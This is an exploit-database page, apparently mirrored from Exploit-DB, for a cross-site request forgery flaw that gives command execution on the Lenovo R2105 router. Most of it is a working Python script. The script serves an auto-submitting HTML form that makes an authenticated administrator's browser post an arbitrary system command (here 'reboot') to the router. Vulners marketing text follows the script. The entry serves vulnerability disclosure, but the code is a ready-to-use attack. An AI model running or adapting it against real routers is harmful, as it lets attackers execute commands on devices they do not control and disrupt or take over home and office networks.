Lucene search
K

Lenovo R2105 - Cross-Site Request Forgery (Command Execution)

🗓️ 14 Jan 2019 00:00:00Reported by Nathu NandwaniType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 75 Views

Lenovo R2105 - Cross-Site Request Forgery (Command Execution) exploit using a crafted HTML form to prompt a remote code executio

Code
# Exploit Title: Lenovo R2105 Remote Code Execution through CSRF
# Date: 01/14/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Version: 1.0
# Tested on: Windows 10 x64
# Note: The administrator who opens the URL should be authenticated.

import socket
 
server_ip = "0.0.0.0"
server_port = 80 
router_ip = "192.168.11.1"

command = "reboot"
 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)
 
print "Currently listening at " + server_ip + ":" + str(server_port)        
 
client, (client_host, client_port) = sock.accept()
 
print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)
 
client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')
client.send("""
<html>
    <body>
        <form method="post" id="frmcmd" name="frmSetup" action="http://""" + router_ip + """/goform/SystemCommand">
            <input name="command" value=""" + command + """ type="hidden">
            <input name="SystemCommandSubmit" value="Apply" type="hidden">
        </form>
        <script>
            document.getElementById("frmcmd").submit();
        </script>
    </body>
</html>
""")
 
client.close()
sock.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation